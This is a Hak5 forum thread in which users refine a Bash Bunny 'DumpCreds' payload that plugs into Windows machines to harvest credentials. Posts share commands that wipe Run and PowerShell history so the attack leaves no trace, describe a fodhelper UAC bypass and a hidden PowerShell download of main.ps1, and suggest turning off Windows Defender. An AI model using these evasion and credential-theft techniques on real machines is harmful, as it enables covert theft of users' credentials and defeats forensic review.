Jump to content
Hak5 Forums

Recommended Posts

Ok, further improvements:

A: Cleared History of "Run" (Win+R) by payload.txt

B: Clear Powershell History (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1

I would like to move it into the Main payload.txt, but Bunny is making problems:

He seems to be confused by the rm $env:Appdata. (He refuses to type the $-Symbol)

Also I had Problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1).

Maybe you can get it implemented in that line, so we even leave no trace in case of unsuccessful loading.

https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

Share this post


Link to post
Share on other sites
23 minutes ago, Feuermagier said:

Ok, further improvements:

A: Cleared History of "Run" (Win+R) by payload.txt

B: Clear Powershell History (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1

I would like to move it into the Main payload.txt, but Bunny is making problems:

He seems to be confused by the rm $env:Appdata. (He refuses to type the $-Symbol)

Also I had Problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1).

Maybe you can get it implemented in that line, so we even leave no trace in case of unsuccessful loading.

https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

Code for clearing "Run" history was already in  main.ps1

.........

#  Epmty Run Input Field
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentContinue
........

Added the code to clear Powwershell history to main.ps1

We should avoid too much "Q GUI r" commands. because it's visible.

Share this post


Link to post
Share on other sites

I did some testing, and the "powershell -w h" showed up in run after completion, so I added it to payload. txt.

We only use GUI + r once, I personally prefer to completely avoid the log by using GUI without r.

Share this post


Link to post
Share on other sites
13 minutes ago, Feuermagier said:

I did some testing, and the "powershell -w h" showed up in run after completion, so I added it to payload. txt.

We only use GUI + r once, I personally prefer to completely avoid the log by using GUI without r.

Q GUI didn't work for me. Q GUI r does. 

Now we have only the taskkill powershell command in the powershell history.

Share this post


Link to post
Share on other sites
59 minutes ago, qdba said:

Q GUI didn't work for me. Q GUI r does. 

Now we have only the taskkill powershell command in the powershell history.

Maybe we can sent the taskkill and the delete in a single, stacked command.

Share this post


Link to post
Share on other sites
2 minutes ago, Feuermagier said:

Maybe we can sent the taskkill and the delete in a single, stacked command.

Got it ...

With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off.  So I set it at the beginning of the Script and delete the History File at the end

Share this post


Link to post
Share on other sites
Just now, qdba said:

Got it ...

With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off.  So I set it at the beginning of the Script and delete the History File at the end

Why save nothing if we delete anyway ?

I thought more of kill powershell and delete file in a double command, so that is clear.

Also we have to switch history back on, because user will have permanently no history, which is suspicious.

Share this post


Link to post
Share on other sites
1 minute ago, Feuermagier said:

Why save nothing if we delete anyway ?

I thought more of kill powershell and delete file in a double command, so that is clear.

Also we have to switch history back on, because user will have permanently no history, which is suspicious.

It cannot be done  in the line with the main.ps1 call because...... 

....... 

A 1 first  Powershell task will be started fo the input of the registry command for UAC Baypass.

Than the fodhelper opens a second Powershell task in Admin mode. The first Powershell task can be closed after the fodhelper thing

The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS Task.
A third PS Task ist opening,  waiting for HTTP Server is coming up and downloads the main.ps1. The second task is closed with the "exit"  at the end of the main.ps1 line.
If you remove the history between the main.ps1 call and the exit command it's to fast. the main.ps1 is still running and create new history events. 

The main.ps1 is ready if the EOF File was created in the loot dir. ( payload.txt: line 95 )

The computer can be cleand after this event.

so...

1. The history must switched of at the very first beginning befor the Regiytry Command of UAC Bypass. 
Considerations: does the Set-PSReadlineOption –HistorySaveStyle SaveNothing comman switch of the history global ? If so ... good... if not set a Marker in History file 

2. Do all the stuff.....

3. Problem....
Switch history on after the EOF will be written. Maybe can be done with switch ATTACKMODE to HID and do all the things in a GUI (r ?)
or
start a dos comandline at the end of main.ps1 wo do all the cleanup (Switch on commandline kill powershell, copy back a saved history file, delete all lines from  marker  to end or.... / and... other things.

Will sleep after that.. 
 

 

 

 

Share this post


Link to post
Share on other sites
13 minutes ago, Feuermagier said:

I don't think Powershell-Scripts are creating History.

Or were you already deleting those ?

I must check, if the command for switching of the history is still in the history file after execution. Can't do it now. Have no powershell here.

The result give me the route foe the rest.

Share this post


Link to post
Share on other sites

Hmm, I keep seeing deja'vu when I read through that main.ps1 :-P

 

Anyway, I maybe touching this script a lot to make some changes. I see some improvements.  I need to mess with the fodhelper bypass technique first though to see what is going on.  I know the Windows 7 Eventviewer bypass technique but only read about the fod one.

 

I just have...ideas.  if the clouds of work break this week, I will spin something out.  Where is the original repo so I can just contribute there?  I will let you push it up to Hak5 if any changes I make meet your liking.

Share this post


Link to post
Share on other sites

Add  multiple UAC Modes

set variable UAC_MODE in payload.txt

UAC_MODE=1  # Fodhelper UAC
UAC_MODE=0 # Standard UAC Mode

Just Beta ( Works on my Windows 10 - Not tested on 7 yet)

Edited by qdba

Share this post


Link to post
Share on other sites
14 hours ago, UnLo said:

Still only work on fw 1.1?

1.1+    any firmware. 1.1 or more.  

  • Like 1

Share this post


Link to post
Share on other sites
8 hours ago, m40295 said:

1.1+    any firmware. 1.1 or more.  

Yep. My bad. Completely missed the (+) 

Share this post


Link to post
Share on other sites

I got it working on Windows 10 Pro edition. However it only worked when the firewall was off, with it on it was unable to get an IP. Any idea? Is there a payload that can turn the Windows Defender off?

Share this post


Link to post
Share on other sites

Hello,

I am on the latest fw and have a odd issue. When I plug in the BB it turns green for a few seconds like its booting then does nothing at all if I have the switch selected for DumpCreds. I would think that the led light would come on but it never does? I have tested a lot of other payloads and never have seen this happen. Does anyone have any ideas?

Thanks!

Share this post


Link to post
Share on other sites
On 4/16/2018 at 2:20 PM, Spoonman said:

I got it working on Windows 10 Pro edition. However it only worked when the firewall was off, with it on it was unable to get an IP. Any idea? Is there a payload that can turn the Windows Defender off?

You can easily make a simple add on to have powershell turn it off and back on at the end

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×